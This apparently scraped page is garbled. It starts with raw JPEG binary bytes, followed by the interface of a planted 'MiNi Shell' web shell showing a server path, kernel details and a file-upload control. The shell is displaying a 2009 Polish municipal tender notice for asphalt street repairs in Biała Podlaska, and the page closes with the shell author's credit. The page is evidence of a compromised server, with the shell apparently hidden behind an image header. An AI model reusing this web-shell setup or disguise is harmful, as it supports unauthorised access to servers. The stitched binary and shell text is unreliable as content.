JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091001/342050-N-2009.html

<p class="kh_header"><b>Biała Podlaska: Remonty cząstkowe ulic o nawierzchni bitumicznej na terenie miasta Biała Podlaska w latach  2010-2012.</b><br>
<b>Numer ogłoszenia: 342050 - 2009; data zamieszczenia: 01.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Biała Podlaska , ul. Marszałka Józefa Piłsudskiego 3, 21-500 Biała Podlaska, tel. 083 3416177, faks 083 3437064.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialapodlaska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty cząstkowe ulic o nawierzchni bitumicznej na terenie miasta Biała Podlaska w latach  2010-2012..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Remonty cząstkowe ulic o nawierzchni bitumicznej na terenie miasta Biała Podlaska w latach  2010-2012.
2.	Rodzaje wykonywanych remontów : 

2.1. Remonty wykonywane w technologii na gorąco masą mineralno- bitumiczną lub 
z recyklera. W zakres prac wchodzi:
2.1.1. obcięcie i oczyszczenie brzegów ubytku lub wyboju, 
2.1.2 oczyszczenie strefy do naprawy i wyeliminowanie elementów nie związanych,
w przypadku występowania wody,  usunięcie jej,
2.1.3. posmarowanie obciętych krawędzi rozgrzanym asfaltem,
2.1.4. skropienie ręczne lub za pomocą  skrapiarki  dna wyboju asfaltem D-200 w ilości 0,4-0,6 kg/m2  zależnie od porowatości wyboju lub ubytku,
2.1.5. ułożenie masy bitumicznej w przygotowanych do naprawy miejscach  warstwami 
nie grubiej niż 4 cm, w ilości 25 kg/m2  każdego centymetra warstwy, przy
wybojach należy uzupełnić podbudowę tłuczniem, 
2.1.6. wyprofilowanie i zagęszczenie masy za pomocą  sprzętu ręcznego lub  
mechanicznego,
2.1.7. skropienie lepiszczem bitumicznym naprawianych miejsc  w ilości 0,8-1,0 kg/m2 
i zasypanie grubym piaskiem lub grysikiem 0-5 mm w ilości 8-10 kg/m2,
2.2. W okresie zimowym przy niskich temperaturach - remonty wykonywane 
w technologii na zimno z zastosowaniem gotowych mieszanek mineralno-
asfaltowych - wykonywane tylko na pisemne potwierdzenie
zamawiającego.  
2.3. Naprawa zniszczeń powierzchniowych  metodą  powierzchniowego utrwalania.  
2.4. Naprawa sfalowań i fałd - poprzez frezowanie częściowe polegające na zlikwidowaniu wzniesień powstałych w nawierzchni bitumicznej do poziomu warstwy ścieralnej z dokładnym  usunięciem z nawierzchni materiału pozostałego po frezowaniu .
3.	Kontrola stanu nawierzchni pod względem konieczności wykonania remontów prowadzona będzie przez Wykonawcę i Zamawiającego. 
W przypadku zgłoszenia (fax lub mail) konieczności wykonania remontów przez Zamawiającego, rozpoczęcie remontów nastąpi w terminie nie dłuższym niż 2 dni od daty zgłoszenia. Minimalna ilość robót wykonywanych przez Wykonawcę dziennie - 50 m2 remontowanej powierzchni . 
4.	W cenę robót określoną z formularzu cenowym należy wliczyć koszt wszystkich robót związanych z wykonywaniem remontów wraz z transportem materiałów i gruzu, kosztami składowania gruzu na wysypisku oraz kosztami zabezpieczenia i oznakowania miejsca robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium: 19 000,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Warunki udziału w postępowaniu

1)O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają 
warunki udziału w postępowaniu, o których mowa w art. 22 ust.1 ustawy Prawo 
zamówień publicznych.
2)	Ocena spełnienia warunków określonych w art. 22 ust.1 ustawy Prawo zamówień 
publicznych oraz warunków  szczegółowych określonych w punkcie 3 nastąpi
na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, 
o których mowa w ust. 2 niniejszego paragrafu. 
3)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące 
warunki:
3.1. posiadający uprawnienia do wykonywania działalności/czynności będącej przedmiotem zamówienia,
3.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią   
pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
technicznego i osób zdolnych do wykonania zamówienia. 
3.2.1. Oferent powinien dysponować:
-młotem udarowym  
- piłą mechaniczną do cięcia asfaltu   
- skrapiarką do bitumu 
- walcem stalowym 
- frezarką
- urządzeniem do smarowania krawędzi powierzchni remontowanych.
3.2.2. posiadanie własnej wytwórni mas mineralno-bitumicznych do remontów na gorąco lub zobowiązanie producenta do sprzedaży masy mineralno-bitumicznej w czasie wskazanym przez wykonawcę albo posiadanie kotłów do wytwarzania mieszanki mineralno- bitumicznej na gorąco.  
3.2.3. Wykonawca wykaże, że zrealizował w okresie ostatnich pięciu lat 
przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 roboty budowlane o zakresie minimum 6000 m 2 odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia.
3.2.4. Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania 
zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do 
udostępnienia osób zdolnych do wykonania zamówienia. 
4)	Sposób dokonywania oceny spełnienia warunków wymaganych od Wykonawców 
nastąpi	 na podstawie dokumentów złożonych przez Wykonawców i oparty będzie na zasadzie spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) W celu wykazania spełnienia warunków udziału w niniejszym postępowaniu, każdy 
z Wykonawców powinien przedłożyć wraz z ofertą - zgodnym z załączonym do SIWZ
formularzem oferty - następujące oświadczenia i dokumenty ( wypełnione i podpisane 
przez osoby uprawnione do reprezentowania Wykonawcy, zgodnie z odpowiednimi 
zapisami w niniejszej SIWZ):

1.1. dokument potwierdzający dopuszczenie Wykonawcy do obrotu prawnego 
w zakresie objętym zamówieniem: aktualny odpis z właściwego rejestru 
albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływam terminu składania ofert;

1.2. aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzający odpowiednio, że Wykonawca nie zalega 
z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu- wystawianych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;

1.3. oświadczenie o treści określonej w art. 22 ust. 1 pkt. 1-3 ustawy Prawo zamówień
Publicznych - wg. wzoru określonego w  załączniku nr 2 do siwz;

1.4. oświadczenie z art. 22 ust. 1 pkt. 4 ustawy Prawo zamówień Publicznych,
- wg wzoru określonego w załączniku Nr 3 do siwz;

1.5.wykaz co najmniej dwóch robót budowlanych o zakresie minimum 6000 m 2 w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadających
  swoim  rodzajem i wartością  robotom budowlanym stanowiącym przedmiot zamówienia, z  podaniem ich wartości, zakresu robót oraz daty i miejsca wykonania, nazwy i adresy inwestorów oraz  załączenia  dokumentów potwierdzających, że roboty te zostały wykonane z  należytą starannością - wg wzoru stanowiącego załącznik Nr 4; 
1.6.wykaz sprzętu - załącznik nr 5
1.7. polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca
jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości 10% wartości zamówienia;

2) Pozostałe dokumenty jakie powinien złożyć wykonawca:

2.1. formularz cenowy;
2.2. parafowany wzór umowy;
2.3. umowę spółki cywilnej (jeśli dotyczy);
2.4. pełnomocnictwo (jeżeli dotyczy) powinno być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.bialapodlaska.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Biala Podlaska
Referat Zamowień Publicznych
ul. Marszałka Józefa Piłsudskiego 3
21-500 Biala Podlaska.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2009 godzina 12:00, miejsce: Urząd Miasta Biala Podlaska
Kancelaria Ogólna pok. nr 8
21-500 Biala Podlaska.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com